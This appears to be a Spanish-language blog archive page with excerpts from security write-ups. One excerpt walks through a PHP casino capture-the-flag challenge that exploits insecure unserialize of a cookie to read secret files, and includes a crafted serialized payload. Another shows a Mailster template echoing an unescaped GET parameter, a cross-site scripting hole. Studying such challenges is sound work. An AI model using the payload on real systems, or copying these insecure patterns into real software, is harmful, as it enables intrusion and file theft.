Archivo

function getrandomstring($length) { global $template; settype($template, "string"); $template = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"; settype($length, "integer"); settype($rndstring, "string"); settype($a, "integer"); settype($b, "integer"); for ($a = 0; $a <= $length; $a++) { $b = rand(0, strlen($template) – 1); $rndstring .= $template[$b]; } return $rndstring; }… Continuar leyendo →

O:12:"casino_debug":1:{s:3:"var";s:3:"bet";}array(2) { ["path"]=> string(23) "/var/www/html/index.php" ["bet"]=> string(27) "ÄÊB8 ¹#‚ ÌPšou„›/secret.php" }

$_SESSION[‘path’] = __FILE__; $_SESSION[‘bet’] = md5($_POST[‘guess’], TRUE) . "/". $_POST[‘bet’];

class casino_debug { public $var = "path"; public function __wakeup(){ var_dump($_SESSION); echo file_get_contents($_SESSION[$this->var]); } }

unserialize(base64_decode($_COOKIE[‘debug’]));

// Unfair 🙁 if (rand() === $_POST[‘guess’]) { echo "You win:" . file_get_contents("secret.php"); } else { echo "You lose :)"; }

<?php session_start(); if ($_GET[‘source’]){ highlight_file(__FILE__); exit(); } class casino_debug { public $var = "path"; public function __wakeup(){ var_dump($_SESSION); echo file_get_contents($_SESSION[$this->var]); } } if (!empty($_GET[‘action’]) && $_GET[‘action’] == "debug") { echo base64_decode($_COOKIE[‘debug’]); unserialize(base64_decode($_COOKIE[‘debug’])); exit(); } if (!empty($_GET[‘action’]) && $_GET[‘action’] == "bet"… Continuar leyendo →

<h2 class="componentheading mailsterUnsubscriberHeader">Unsubscription</h2> <div class="contentpane"> <div id="mailsterContainer"> <div id="mailsterUnsubscriber"> <div id="mailsterUnsubscriberDescription"><?php echo $_GET[‘mes’]; ?></div> </div> </div> </div>